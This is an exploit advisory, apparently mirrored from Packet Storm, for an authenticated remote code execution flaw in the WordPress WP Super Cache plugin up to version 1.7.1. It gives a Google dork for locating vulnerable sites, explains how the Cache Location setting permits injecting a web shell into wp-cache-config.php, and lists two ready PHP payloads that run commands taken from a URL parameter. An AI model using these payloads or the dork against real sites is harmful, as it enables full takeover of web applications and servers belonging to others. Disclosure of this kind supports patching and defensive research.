WordPress WP Super Cache 1.7.1 Remote Code Execution ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 30th, 2021 📆 | 5294 Views ⚑

0

WordPress WP Super Cache 1.7.1 Remote Code Execution ≈ Packet Storm

# Exploit Title: WordPress Plugin WP Super Cache 1.7.1 – Remote Code Execution (Authenticated)
# Google Dork: inurl:/wp-content/plugins/wp-super-cache/
# Date: 2021-03-13
# Exploit Author: m0ze
# Version: < = 1.7.1
# Software Link: https://wordpress.org/plugins/wp-super-cache/

### — [ Info: ] [i] An Authenticated RCE vulnerability was discovered in the WP Super Cache plugin through 1.7.1 for WordPress.

[i] RCE due to input validation failure and weak $cache_path check in the WP Super Cache Settings -> Cache Location option. Direct access to the wp-cache-config.php file is not prohibited, so this vulnerability can be exploited for a web shell injection.

[i] Another possible attack vector: from XSS to RCE.

### — [ Impact: ] [~] Full compromise of the vulnerable web application and also web server.

### — [ Payloads: ] [$] ‘;system($_GET[13]);include_once ‘wp-cache-config.php’;’

[$] ‘;`$_GET[13]`;include_once ‘wp-cache-config.php’;?>